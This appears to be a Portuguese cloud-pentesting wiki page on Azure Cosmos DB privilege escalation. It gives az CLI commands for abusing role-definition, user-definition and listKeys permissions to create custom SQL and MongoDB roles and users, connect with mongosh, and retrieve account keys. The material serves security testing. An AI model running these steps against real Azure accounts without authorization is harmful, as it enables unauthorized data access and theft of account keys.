Az - CosmosDB Privesc

Reading time: 4 minutes

CosmosDB Privesc

Para mais informações sobre SQL Database, consulte:

Az - CosmosDB

(Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/write, Microsoft.DocumentDB/databaseAccounts/sqlRoleDefinitions/read) & (Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/write, Microsoft.DocumentDB/databaseAccounts/sqlRoleAssignments/read)

Com essas permissões, você pode escalar privilégios, concedendo a um usuário as permissões para executar consultas e conectar-se ao banco de dados. Primeiro, um papel de definição é criado, concedendo as permissões e escopos necessários.

az cosmosdb sql role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<Random-Unique-ID>", # For example 12345678-1234-1234-1234-123456789az
"RoleName": "CustomReadRole",
"Type": "CustomRole",
"AssignableScopes": [
"/subscriptions/<subscription_id>/resourceGroups/sqldatabase/providers/Microsoft.DocumentDB/databaseAccounts/<account_name>"
],
"Permissions": [
{
"DataActions": [
"Microsoft.DocumentDB/databaseAccounts/readMetadata",
"Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/items/read",
"Microsoft.DocumentDB/databaseAccounts/sqlDatabases/containers/*"
]
}
]
}'

Após isso, a atribuição da definição é dada a um usuário. Depois disso, esse usuário pode usar o método de conexão DefaultAzureCredential() para executar consultas.

az cosmosdb sql role assignment create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--role-definition-id <Random-Unique-ID-used-in-definition> \
--principal-id <principal_id-togive-perms> \
--scope "/"

(Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/write && Microsoft.DocumentDB/databaseAccounts/mongodbRoleDefinitions/read)&& (Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/write && Microsoft.DocumentDB/databaseAccounts/mongodbUserDefinitions/read)

Com esta permissão, você pode criar novas definições de função MongoDB dentro de uma conta do Azure Cosmos DB. Isso permite definir funções personalizadas com permissões específicas para usuários do MongoDB. As funcionalidades de RBAC devem estar habilitadas para usar isso.

az cosmosdb mongodb role definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.readWriteRole",
"RoleName": "readWriteRole",
"Type": "CustomRole",
"DatabaseName": "<mydatabase>",
"Privileges": [
{
"Resource": {
"Db": "<mydatabase>",
"Collection": "mycollection"
},
"Actions": [
"insert",
"find",
"update"
]
}
],
"Roles": []
}'

Você pode criar novas definições de usuários MongoDB dentro de uma conta Azure Cosmos DB. Isso permite o provisionamento de usuários com funções específicas e acesso a bancos de dados MongoDB.

az cosmosdb mongodb user definition create \
--account-name <account_name> \
--resource-group <resource_group_name> \
--body '{
"Id": "<mydatabase>.myUser",
"UserName": "<myUser>",
"Password": "<mySecurePassword>",
"DatabaseName": "<mydatabase>",
"CustomData": "TestCustomData",
"Mechanisms": "SCRAM-SHA-256",
"Roles": [
{
"Role": "readWriteRole",
"Db": "<mydatabase>"
}
]
}'

Após isso, um novo usuário é criado dentro do MongoDB, podemos acessá-lo:

mongosh "mongodb://<myUser>:<mySecurePassword>@<account_name>.mongo.cosmos.azure.com:10255/<mymongodatabase>?ssl=true&replicaSet=globaldb&retrywrites=false"

Microsoft.DocumentDB/databaseAccounts/listKeys/action

Com esta permissão, você pode recuperar as chaves primária e secundária para uma conta do Azure Cosmos DB. Essas chaves fornecem acesso total à conta do banco de dados e seus recursos, permitindo ações como leituras de dados, gravações e alterações de configuração.

az cosmosdb keys list \
--name <account_name> \
--resource-group <resource_group_name>